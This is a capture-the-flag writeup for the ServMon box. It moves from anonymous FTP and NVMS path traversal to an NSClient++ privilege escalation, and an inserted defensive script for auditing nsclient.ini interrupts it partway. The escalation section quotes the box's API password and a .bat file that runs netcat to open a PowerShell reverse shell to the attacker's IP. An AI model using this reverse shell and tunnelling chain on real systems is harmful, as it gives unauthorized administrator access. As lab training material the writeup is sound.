This time I am writing the solution for the ServMon box, an easy Windows box. Let's dive into the solution.
🔥 nmap to get the open ports.
nmap -sC -sV -oA initial -Pn 10.10.10.184
First of all, the port I will look at is FTP, because anonymous access is allowed.
There is a directory named Users, and inside it there are two directories, Nadine and Nathan, containing two files named Confidential.txt and Notes to do.txt respectively. It is a good idea at this point to keep a note of these two usernames.
The content of Confidential.txt:
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
I keep in the back of my mind that there is a file named Passwords.txt in Nathan's Desktop folder.
Notes to do.txt:
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
There are some incomplete to-dos, such as "Remove public access to NVMS". Remember port 80? Let's take a look at that.
So this confirms the 4th to-do. I try to log in using admin as both username and password, but nothing. At this point, because I don't have a password, I search for known vulnerabilities.
I open Burp, navigate to 10.10.10.184, intercept the request and then send it to Repeater (Ctrl+R).
And indeed this works. Now, if you remember from Confidential.txt, there is a file with passwords. I get that file.
After trying each of these passwords over SSH:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>
We can get the user flag now.
After searching the box for hints about root, I find nothing. Going back to nmap, we can see port 8443 open with an SSL certificate. Visiting the site brings up a
Searching with searchsploit, it turns out there is a privilege escalation.
First we need to get the client's password from the nsclient.ini file:
; Undocumented key
password = ew2x6SsGTxjRwXOT
But the password does not work, giving us a 403.
Going back to the nsclient.ini file, I see there is a setting present which only allows connections from
; Undocumented key
allowed hosts = 127.0.0.1
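The two nsclient.ini keys above are exactly what a defender should be checking for on a host running NSClient++: a plaintext API password in a file a low-privileged user can read, and an allowed-hosts list that, even when restricted to loopback, still leaves the API reachable to any local user. The following audit script is an added example, not part of the original writeup and not NSClient++'s own tooling. It parses a constructed nsclient.ini sample modelled on the two keys quoted in the writeup; the [/modules] section and the module names CheckExternalScripts and Scheduler are standard NSClient++ names assumed here (the writeup does not name the two modules it enables), and the password value in the sample is a placeholder.

```python
"""Added example (not from the writeup): audit an NSClient++-style
nsclient.ini for the settings that made the ServMon privilege escalation
possible. The keys 'password' and 'allowed hosts' are the two quoted on the
page, under [/settings/default]; the [/modules] section and the
CheckExternalScripts / Scheduler module names are assumed standard
NSClient++ names, not taken from the page."""
from typing import Dict, List, Tuple

# Constructed sample config in the same '; Undocumented key' comment style
# as the writeup. The password is a placeholder, not the box's real value.
SAMPLE_INI = """
[/modules]
; Assumed module names (standard NSClient++), not shown on the page
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
; Undocumented key
allowed hosts = 127.0.0.1
; Undocumented key
password = PLACEHOLDER_PASSWORD
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
# Modules that together let the web UI define a script and run it on a timer
RISKY_MODULES = ("checkexternalscripts", "scheduler")


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parser: '[section]' headers, 'key = value' pairs,
    ';' or '#' comment lines. Section and key names are lower-cased."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def audit(text: str) -> List[Tuple[str, str]]:
    """Return (severity, message) findings for the given config text."""
    cfg = parse_ini(text)
    findings: List[Tuple[str, str]] = []
    default = cfg.get("/settings/default", {})

    # Finding 1: the API password sits in a file a low-privileged user can
    # read. On ServMon this, not listener exposure, was the first step.
    if default.get("password"):
        findings.append(("HIGH", "plaintext API password stored in nsclient.ini; "
                                 "restrict the file's ACL to administrators"))

    # Finding 2: who may connect. Non-loopback entries widen the attack
    # surface; loopback-only is still reachable by any local user or tunnel.
    hosts = {h.strip() for h in default.get("allowed hosts", "").split(",") if h.strip()}
    remote = sorted(hosts - LOOPBACK)
    if remote:
        findings.append(("HIGH", f"API listener accepts non-loopback hosts: {remote}"))
    elif hosts:
        findings.append(("INFO", "allowed hosts is loopback-only; this does not stop "
                                 "local users (or ssh -L tunnels) from reaching the API"))

    # Finding 3: modules that turn API access into command execution
    modules = cfg.get("/modules", {})
    enabled = [m for m in RISKY_MODULES
               if modules.get(m, "").lower() in ("enabled", "1", "true")]
    if len(enabled) == len(RISKY_MODULES):
        findings.append(("HIGH", "CheckExternalScripts and Scheduler are both enabled: "
                                 "anyone holding the API password can schedule scripts"))
    elif enabled:
        findings.append(("MEDIUM", f"risky module enabled: {enabled[0]}"))
    return findings


if __name__ == "__main__":
    for severity, msg in audit(SAMPLE_INI):
        print(f"[{severity}] {msg}")
```

Run against the real file on a host (`audit(open(path).read())`), the INFO finding is the one worth reading twice: "allowed hosts = 127.0.0.1" is a network-level restriction only, which is why the writeup gets past it with an SSH port forward. The mitigation that would actually have stopped this chain is the file ACL on nsclient.ini and not reusing the API password anywhere a low-privileged user can read it.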
Because I am using SSH, I can create a local tunnel from my host to NSClient++ and then access it locally. To do this I use a trick to reach something like a hidden menu in SSH, and then execute
-L 8443:127.0.0.1:8443. Then I go to my browser and access the website with
I now create a .bat script:
@echo off
C:\Temp\nc.exe 10.10.14.52 9854 -e powershell
and upload it alongside nc.exe into
C:\Temp\, then set up a listener on our local box.
The next step is to enable two modules:
After that I create an external script with these key and value (replace fuxsocy.bat with your .bat filename).
Next I set it up to run every minute,
and specify the command, which in our case is rce, the name of the external script that will execute the command.
Then I save the changes under the
Changes button, and under the
Control button I reset the service. I wait 1-2 minutes and get a shell as administrator.